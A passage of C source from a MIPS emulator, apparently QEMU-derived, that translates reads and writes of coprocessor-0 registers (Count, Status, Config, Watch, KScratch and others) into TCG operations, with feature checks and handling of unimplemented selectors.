(tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } gen_helper_mfc0_count(tcg_ctx, arg, tcg_ctx->cpu_env); /* * Break the TB to be able to take timer interrupts immediately * after reading count. DISAS_STOP isn't sufficient, we need to * ensure we break completely out of translated code. 
*/ gen_save_pc(tcg_ctx, ctx->base.pc_next + 4); ctx->base.is_jmp = DISAS_EXIT; //register_name = "Count"; break; case CP0_REG09__SAARI: CP0_CHECK(ctx->saar); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_SAARI)); //register_name = "SAARI"; break; case CP0_REG09__SAAR: CP0_CHECK(ctx->saar); gen_helper_dmfc0_saar(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "SAAR"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_10: switch (sel) { case CP0_REG10__ENTRYHI: tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_EntryHi)); //register_name = "EntryHi"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_11: switch (sel) { case CP0_REG11__COMPARE: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Compare)); //register_name = "Compare"; break; /* 6,7 are implementation dependent */ default: goto cp0_unimplemented; } break; case CP0_REGISTER_12: switch (sel) { case CP0_REG12__STATUS: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Status)); //register_name = "Status"; break; case CP0_REG12__INTCTL: check_insn(ctx, ISA_MIPS32R2); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_IntCtl)); //register_name = "IntCtl"; break; case CP0_REG12__SRSCTL: check_insn(ctx, ISA_MIPS32R2); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_SRSCtl)); //register_name = "SRSCtl"; break; case CP0_REG12__SRSMAP: check_insn(ctx, ISA_MIPS32R2); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_SRSMap)); //register_name = "SRSMap"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_13: switch (sel) { case CP0_REG13__CAUSE: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Cause)); //register_name = "Cause"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_14: switch (sel) { case CP0_REG14__EPC: tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_EPC)); //register_name = "EPC"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_15: switch (sel) { case CP0_REG15__PRID: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_PRid)); //register_name = "PRid"; break; case CP0_REG15__EBASE: check_insn(ctx, ISA_MIPS32R2); tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_EBase)); //register_name = "EBase"; break; case CP0_REG15__CMGCRBASE: check_insn(ctx, ISA_MIPS32R2); CP0_CHECK(ctx->cmgcr); tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_CMGCRBase)); //register_name = "CMGCRBase"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_16: switch (sel) { case CP0_REG16__CONFIG: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Config0)); //register_name = "Config"; break; case CP0_REG16__CONFIG1: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Config1)); //register_name = "Config1"; break; case CP0_REG16__CONFIG2: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Config2)); //register_name = "Config2"; break; case CP0_REG16__CONFIG3: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Config3)); //register_name = "Config3"; break; case CP0_REG16__CONFIG4: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Config4)); //register_name = "Config4"; break; case CP0_REG16__CONFIG5: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Config5)); //register_name = "Config5"; break; /* 6,7 are implementation dependent */ case CP0_REG16__CONFIG6: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Config6)); //register_name = "Config6"; break; case 
CP0_REG16__CONFIG7: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Config7)); //register_name = "Config7"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_17: switch (sel) { case CP0_REG17__LLADDR: gen_helper_dmfc0_lladdr(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "LLAddr"; break; case CP0_REG17__MAAR: CP0_CHECK(ctx->mrp); gen_helper_dmfc0_maar(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "MAAR"; break; case CP0_REG17__MAARI: CP0_CHECK(ctx->mrp); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_MAARI)); //register_name = "MAARI"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_18: switch (sel) { case CP0_REG18__WATCHLO0: case CP0_REG18__WATCHLO1: case CP0_REG18__WATCHLO2: case CP0_REG18__WATCHLO3: case CP0_REG18__WATCHLO4: case CP0_REG18__WATCHLO5: case CP0_REG18__WATCHLO6: case CP0_REG18__WATCHLO7: CP0_CHECK(ctx->CP0_Config1 & (1 << CP0C1_WR)); gen_helper_1e0i(dmfc0_watchlo, arg, sel); //register_name = "WatchLo"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_19: switch (sel) { case CP0_REG19__WATCHHI0: case CP0_REG19__WATCHHI1: case CP0_REG19__WATCHHI2: case CP0_REG19__WATCHHI3: case CP0_REG19__WATCHHI4: case CP0_REG19__WATCHHI5: case CP0_REG19__WATCHHI6: case CP0_REG19__WATCHHI7: CP0_CHECK(ctx->CP0_Config1 & (1 << CP0C1_WR)); gen_helper_1e0i(dmfc0_watchhi, arg, sel); //register_name = "WatchHi"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_20: switch (sel) { case CP0_REG20__XCONTEXT: check_insn(ctx, ISA_MIPS3); tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_XContext)); //register_name = "XContext"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_21: /* Officially reserved, but sel 0 is used for R1x000 framemask */ CP0_CHECK(!(ctx->insn_flags & ISA_MIPS32R6)); switch (sel) { case 0: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Framemask)); //register_name = "Framemask"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_22: tcg_gen_movi_tl(tcg_ctx, arg, 0); /* unimplemented */ //register_name = "'Diagnostic"; /* implementation dependent */ break; case CP0_REGISTER_23: switch (sel) { case CP0_REG23__DEBUG: gen_helper_mfc0_debug(tcg_ctx, arg, tcg_ctx->cpu_env); /* EJTAG support */ //register_name = "Debug"; break; case CP0_REG23__TRACECONTROL: /* PDtrace support */ /* gen_helper_dmfc0_tracecontrol(tcg_ctx, arg, tcg_ctx->cpu_env); */ //register_name = "TraceControl"; goto cp0_unimplemented; case CP0_REG23__TRACECONTROL2: /* PDtrace support */ /* gen_helper_dmfc0_tracecontrol2(tcg_ctx, arg, tcg_ctx->cpu_env); */ //register_name = "TraceControl2"; goto cp0_unimplemented; case CP0_REG23__USERTRACEDATA1: /* PDtrace support */ /* gen_helper_dmfc0_usertracedata1(tcg_ctx, arg, tcg_ctx->cpu_env);*/ //register_name = "UserTraceData1"; goto cp0_unimplemented; case CP0_REG23__TRACEIBPC: /* PDtrace support */ /* gen_helper_dmfc0_traceibpc(tcg_ctx, arg, tcg_ctx->cpu_env); */ //register_name = "TraceIBPC"; goto cp0_unimplemented; case CP0_REG23__TRACEDBPC: /* PDtrace support */ /* gen_helper_dmfc0_tracedbpc(tcg_ctx, arg, tcg_ctx->cpu_env); */ //register_name = "TraceDBPC"; goto cp0_unimplemented; default: goto cp0_unimplemented; } break; case CP0_REGISTER_24: switch (sel) { case CP0_REG24__DEPC: /* EJTAG support */ tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_DEPC)); //register_name = "DEPC"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_25: switch (sel) { case 
CP0_REG25__PERFCTL0: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Performance0)); //register_name = "Performance0"; break; case CP0_REG25__PERFCNT0: /* gen_helper_dmfc0_performance1(tcg_ctx, arg); */ //register_name = "Performance1"; goto cp0_unimplemented; case CP0_REG25__PERFCTL1: /* gen_helper_dmfc0_performance2(tcg_ctx, arg); */ //register_name = "Performance2"; goto cp0_unimplemented; case CP0_REG25__PERFCNT1: /* gen_helper_dmfc0_performance3(tcg_ctx, arg); */ //register_name = "Performance3"; goto cp0_unimplemented; case CP0_REG25__PERFCTL2: /* gen_helper_dmfc0_performance4(tcg_ctx, arg); */ //register_name = "Performance4"; goto cp0_unimplemented; case CP0_REG25__PERFCNT2: /* gen_helper_dmfc0_performance5(tcg_ctx, arg); */ //register_name = "Performance5"; goto cp0_unimplemented; case CP0_REG25__PERFCTL3: /* gen_helper_dmfc0_performance6(tcg_ctx, arg); */ //register_name = "Performance6"; goto cp0_unimplemented; case CP0_REG25__PERFCNT3: /* gen_helper_dmfc0_performance7(tcg_ctx, arg); */ //register_name = "Performance7"; goto cp0_unimplemented; default: goto cp0_unimplemented; } break; case CP0_REGISTER_26: switch (sel) { case CP0_REG26__ERRCTL: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_ErrCtl)); //register_name = "ErrCtl"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_27: switch (sel) { /* ignored */ case CP0_REG27__CACHERR: tcg_gen_movi_tl(tcg_ctx, arg, 0); /* unimplemented */ //register_name = "CacheErr"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_28: switch (sel) { case CP0_REG28__TAGLO: case CP0_REG28__TAGLO1: case CP0_REG28__TAGLO2: case CP0_REG28__TAGLO3: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_TagLo)); //register_name = "TagLo"; break; case CP0_REG28__DATALO: case CP0_REG28__DATALO1: case CP0_REG28__DATALO2: case CP0_REG28__DATALO3: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_DataLo)); //register_name = "DataLo"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_29: switch (sel) { case CP0_REG29__TAGHI: case CP0_REG29__TAGHI1: case CP0_REG29__TAGHI2: case CP0_REG29__TAGHI3: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_TagHi)); //register_name = "TagHi"; break; case CP0_REG29__DATAHI: case CP0_REG29__DATAHI1: case CP0_REG29__DATAHI2: case CP0_REG29__DATAHI3: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_DataHi)); //register_name = "DataHi"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_30: switch (sel) { case CP0_REG30__ERROREPC: tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_ErrorEPC)); //register_name = "ErrorEPC"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_31: switch (sel) { case CP0_REG31__DESAVE: /* EJTAG support */ gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_DESAVE)); //register_name = "DESAVE"; break; case CP0_REG31__KSCRATCH1: case CP0_REG31__KSCRATCH2: case CP0_REG31__KSCRATCH3: case CP0_REG31__KSCRATCH4: case CP0_REG31__KSCRATCH5: case CP0_REG31__KSCRATCH6: CP0_CHECK(ctx->kscrexist & (1 << sel)); tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_KScratch[sel - 2])); //register_name = "KScratch"; break; default: goto cp0_unimplemented; } break; default: goto cp0_unimplemented; } return; cp0_unimplemented: //qemu_log_mask(LOG_UNIMP, "dmfc0 %s (reg %d sel %d)\n", //register_name, reg, sel); gen_mfc0_unimplemented(ctx, arg); } static void gen_dmtc0(DisasContext *ctx, TCGv arg, int reg, int sel) { TCGContext *tcg_ctx = 
ctx->uc->tcg_ctx; //const char *register_name = "invalid"; if (sel != 0) { check_insn(ctx, ISA_MIPS64); } if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } switch (reg) { case CP0_REGISTER_00: switch (sel) { case CP0_REG00__INDEX: gen_helper_mtc0_index(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "Index"; break; case CP0_REG00__MVPCONTROL: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mtc0_mvpcontrol(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "MVPControl"; break; case CP0_REG00__MVPCONF0: CP0_CHECK(ctx->insn_flags & ASE_MT); /* ignored */ //register_name = "MVPConf0"; break; case CP0_REG00__MVPCONF1: CP0_CHECK(ctx->insn_flags & ASE_MT); /* ignored */ //register_name = "MVPConf1"; break; case CP0_REG00__VPCONTROL: CP0_CHECK(ctx->vp); /* ignored */ //register_name = "VPControl"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_01: switch (sel) { case CP0_REG01__RANDOM: /* ignored */ //register_name = "Random"; break; case CP0_REG01__VPECONTROL: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mtc0_vpecontrol(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "VPEControl"; break; case CP0_REG01__VPECONF0: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mtc0_vpeconf0(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "VPEConf0"; break; case CP0_REG01__VPECONF1: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mtc0_vpeconf1(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "VPEConf1"; break; case CP0_REG01__YQMASK: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mtc0_yqmask(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "YQMask"; break; case CP0_REG01__VPESCHEDULE: CP0_CHECK(ctx->insn_flags & ASE_MT); tcg_gen_st_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_VPESchedule)); //register_name = "VPESchedule"; break; case CP0_REG01__VPESCHEFBACK: CP0_CHECK(ctx->insn_flags & ASE_MT); tcg_gen_st_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_VPEScheFBack)); //register_name = "VPEScheFBack"; break; case CP0_REG01__VPEOPT: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mtc0_vpeopt(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "VPEOpt"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_02: switch (sel) { case CP0_REG02__ENTRYLO0: gen_helper_dmtc0_entrylo0(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "EntryLo0"; break; case CP0_REG02__TCSTATUS: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mtc0_tcstatus(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "TCStatus"; break; case CP0_REG02__TCBIND: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mtc0_tcbind(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "TCBind"; break; case CP0_REG02__TCRESTART: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mtc0_tcrestart(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "TCRestart"; break; case CP0_REG02__TCHALT: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mtc0_tchalt(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "TCHalt"; break; case CP0_REG02__TCCONTEXT: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mtc0_tccontext(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "TCContext"; break; case CP0_REG02__TCSCHEDULE: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mtc0_tcschedule(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "TCSchedule"; break; case CP0_REG02__TCSCHEFBACK: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mtc0_tcschefback(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "TCScheFBack"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_03: switch (sel) { 
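/* CP0 register 3: sel 0 (EntryLo1) is the second half of a TLB entry pair; sel 1 (GlobalNumber) is read-only, so the write below is silently ignored. */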
case CP0_REG03__ENTRYLO1: gen_helper_dmtc0_entrylo1(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "EntryLo1"; break; case CP0_REG03__GLOBALNUM: CP0_CHECK(ctx->vp); /* ignored */ //register_name = "GlobalNumber"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_04: switch (sel) { case CP0_REG04__CONTEXT: gen_helper_mtc0_context(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "Context"; break; case CP0_REG04__CONTEXTCONFIG: /* SmartMIPS ASE */ /* gen_helper_dmtc0_contextconfig(tcg_ctx, arg); */ //register_name = "ContextConfig"; goto cp0_unimplemented; case CP0_REG04__USERLOCAL: CP0_CHECK(ctx->ulri); tcg_gen_st_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, active_tc.CP0_UserLocal)); //register_name = "UserLocal"; break; case CP0_REG04__MMID: CP0_CHECK(ctx->mi); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_MemoryMapID)); //register_name = "MMID"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_05: switch (sel) { case CP0_REG05__PAGEMASK: gen_helper_mtc0_pagemask(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "PageMask"; break; case CP0_REG05__PAGEGRAIN: check_insn(ctx, ISA_MIPS32R2); gen_helper_mtc0_pagegrain(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "PageGrain"; break; case CP0_REG05__SEGCTL0: CP0_CHECK(ctx->sc); gen_helper_mtc0_segctl0(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "SegCtl0"; break; case CP0_REG05__SEGCTL1: CP0_CHECK(ctx->sc); gen_helper_mtc0_segctl1(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "SegCtl1"; break; case CP0_REG05__SEGCTL2: CP0_CHECK(ctx->sc); gen_helper_mtc0_segctl2(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "SegCtl2"; break; case CP0_REG05__PWBASE: check_pw(ctx); tcg_gen_st_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_PWBase)); //register_name = "PWBase"; break; case CP0_REG05__PWFIELD: check_pw(ctx); gen_helper_mtc0_pwfield(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "PWField"; break; case CP0_REG05__PWSIZE: check_pw(ctx); gen_helper_mtc0_pwsize(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "PWSize"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_06: switch (sel) { case CP0_REG06__WIRED: gen_helper_mtc0_wired(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "Wired"; break; case CP0_REG06__SRSCONF0: check_insn(ctx, ISA_MIPS32R2); gen_helper_mtc0_srsconf0(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "SRSConf0"; break; case CP0_REG06__SRSCONF1: check_insn(ctx, ISA_MIPS32R2); gen_helper_mtc0_srsconf1(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "SRSConf1"; break; case CP0_REG06__SRSCONF2: check_insn(ctx, ISA_MIPS32R2); gen_helper_mtc0_srsconf2(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "SRSConf2"; break; case CP0_REG06__SRSCONF3: check_insn(ctx, ISA_MIPS32R2); gen_helper_mtc0_srsconf3(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "SRSConf3"; break; case CP0_REG06__SRSCONF4: check_insn(ctx, ISA_MIPS32R2); gen_helper_mtc0_srsconf4(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "SRSConf4"; break; case CP0_REG06__PWCTL: check_pw(ctx); gen_helper_mtc0_pwctl(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "PWCtl"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_07: switch (sel) { case CP0_REG07__HWRENA: check_insn(ctx, ISA_MIPS32R2); gen_helper_mtc0_hwrena(tcg_ctx, tcg_ctx->cpu_env, arg); ctx->base.is_jmp = DISAS_STOP; //register_name = "HWREna"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_08: switch (sel) { case CP0_REG08__BADVADDR: /* ignored */ 
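/* CP0 register 8 (BadVAddr, BadInstr, BadInstrP, BadInstrX) only reports fault state; it is read-only, so all four writes are ignored. */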
//register_name = "BadVAddr"; break; case CP0_REG08__BADINSTR: /* ignored */ //register_name = "BadInstr"; break; case CP0_REG08__BADINSTRP: /* ignored */ //register_name = "BadInstrP"; break; case CP0_REG08__BADINSTRX: /* ignored */ //register_name = "BadInstrX"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_09: switch (sel) { case CP0_REG09__COUNT: gen_helper_mtc0_count(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "Count"; break; case CP0_REG09__SAARI: CP0_CHECK(ctx->saar); gen_helper_mtc0_saari(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "SAARI"; break; case CP0_REG09__SAAR: CP0_CHECK(ctx->saar); gen_helper_mtc0_saar(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "SAAR"; break; default: goto cp0_unimplemented; } /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; break; case CP0_REGISTER_10: switch (sel) { case CP0_REG10__ENTRYHI: gen_helper_mtc0_entryhi(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "EntryHi"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_11: switch (sel) { case CP0_REG11__COMPARE: gen_helper_mtc0_compare(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "Compare"; break; /* 6,7 are implementation dependent */ default: goto cp0_unimplemented; } /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; break; case CP0_REGISTER_12: switch (sel) { case CP0_REG12__STATUS: save_cpu_state(ctx, 1); gen_helper_mtc0_status(tcg_ctx, tcg_ctx->cpu_env, arg); /* DISAS_STOP isn't good enough here, hflags may have changed. */ gen_save_pc(tcg_ctx, ctx->base.pc_next + 4); ctx->base.is_jmp = DISAS_EXIT; //register_name = "Status"; break; case CP0_REG12__INTCTL: check_insn(ctx, ISA_MIPS32R2); gen_helper_mtc0_intctl(tcg_ctx, tcg_ctx->cpu_env, arg); /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; //register_name = "IntCtl"; break; case CP0_REG12__SRSCTL: check_insn(ctx, ISA_MIPS32R2); gen_helper_mtc0_srsctl(tcg_ctx, tcg_ctx->cpu_env, arg); /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; //register_name = "SRSCtl"; break; case CP0_REG12__SRSMAP: check_insn(ctx, ISA_MIPS32R2); gen_mtc0_store32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_SRSMap)); /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; //register_name = "SRSMap"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_13: switch (sel) { case CP0_REG13__CAUSE: save_cpu_state(ctx, 1); gen_helper_mtc0_cause(tcg_ctx, tcg_ctx->cpu_env, arg); /* * Stop translation as we may have triggered an interrupt. * DISAS_STOP isn't sufficient, we need to ensure we break out of * translated code to check for pending interrupts. 
*/ gen_save_pc(tcg_ctx, ctx->base.pc_next + 4); ctx->base.is_jmp = DISAS_EXIT; //register_name = "Cause"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_14: switch (sel) { case CP0_REG14__EPC: tcg_gen_st_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_EPC)); //register_name = "EPC"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_15: switch (sel) { case CP0_REG15__PRID: /* ignored */ //register_name = "PRid"; break; case CP0_REG15__EBASE: check_insn(ctx, ISA_MIPS32R2); gen_helper_mtc0_ebase(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "EBase"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_16: switch (sel) { case CP0_REG16__CONFIG: gen_helper_mtc0_config0(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "Config"; /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; break; case CP0_REG16__CONFIG1: /* ignored, read only */ //register_name = "Config1"; break; case CP0_REG16__CONFIG2: gen_helper_mtc0_config2(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "Config2"; /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; break; case CP0_REG16__CONFIG3: gen_helper_mtc0_config3(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "Config3"; /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; break; case CP0_REG16__CONFIG4: /* currently ignored */ //register_name = "Config4"; break; case CP0_REG16__CONFIG5: gen_helper_mtc0_config5(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "Config5"; /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; break; /* 6,7 are implementation dependent */ default: //register_name = "Invalid config selector"; goto cp0_unimplemented; } break; case CP0_REGISTER_17: switch (sel) { case CP0_REG17__LLADDR: gen_helper_mtc0_lladdr(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "LLAddr"; break; case CP0_REG17__MAAR: CP0_CHECK(ctx->mrp); gen_helper_mtc0_maar(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "MAAR"; break; case CP0_REG17__MAARI: CP0_CHECK(ctx->mrp); gen_helper_mtc0_maari(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "MAARI"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_18: switch (sel) { case CP0_REG18__WATCHLO0: case CP0_REG18__WATCHLO1: case CP0_REG18__WATCHLO2: case CP0_REG18__WATCHLO3: case CP0_REG18__WATCHLO4: case CP0_REG18__WATCHLO5: case CP0_REG18__WATCHLO6: case CP0_REG18__WATCHLO7: CP0_CHECK(ctx->CP0_Config1 & (1 << CP0C1_WR)); gen_helper_0e1i(mtc0_watchlo, arg, sel); //register_name = "WatchLo"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_19: switch (sel) { case CP0_REG19__WATCHHI0: case CP0_REG19__WATCHHI1: case CP0_REG19__WATCHHI2: case CP0_REG19__WATCHHI3: case CP0_REG19__WATCHHI4: case CP0_REG19__WATCHHI5: case CP0_REG19__WATCHHI6: case CP0_REG19__WATCHHI7: CP0_CHECK(ctx->CP0_Config1 & (1 << CP0C1_WR)); gen_helper_0e1i(mtc0_watchhi, arg, sel); //register_name = "WatchHi"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_20: switch (sel) { case CP0_REG20__XCONTEXT: check_insn(ctx, ISA_MIPS3); gen_helper_mtc0_xcontext(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "XContext"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_21: /* Officially reserved, but sel 0 is used for R1x000 framemask */ CP0_CHECK(!(ctx->insn_flags & ISA_MIPS32R6)); switch (sel) { case 0: gen_helper_mtc0_framemask(tcg_ctx, 
tcg_ctx->cpu_env, arg); //register_name = "Framemask"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_22: /* ignored */ //register_name = "Diagnostic"; /* implementation dependent */ break; case CP0_REGISTER_23: switch (sel) { case CP0_REG23__DEBUG: gen_helper_mtc0_debug(tcg_ctx, tcg_ctx->cpu_env, arg); /* EJTAG support */ /* DISAS_STOP isn't good enough here, hflags may have changed. */ gen_save_pc(tcg_ctx, ctx->base.pc_next + 4); ctx->base.is_jmp = DISAS_EXIT; //register_name = "Debug"; break; case CP0_REG23__TRACECONTROL: /* PDtrace support */ /* gen_helper_mtc0_tracecontrol(tcg_ctx, tcg_ctx->cpu_env, arg); */ /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; //register_name = "TraceControl"; goto cp0_unimplemented; case CP0_REG23__TRACECONTROL2: /* PDtrace support */ /* gen_helper_mtc0_tracecontrol2(tcg_ctx, tcg_ctx->cpu_env, arg); */ /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; //register_name = "TraceControl2"; goto cp0_unimplemented; case CP0_REG23__USERTRACEDATA1: /* PDtrace support */ /* gen_helper_mtc0_usertracedata1(tcg_ctx, tcg_ctx->cpu_env, arg);*/ /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; //register_name = "UserTraceData1"; goto cp0_unimplemented; case CP0_REG23__TRACEIBPC: /* PDtrace support */ /* gen_helper_mtc0_traceibpc(tcg_ctx, tcg_ctx->cpu_env, arg); */ /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; //register_name = 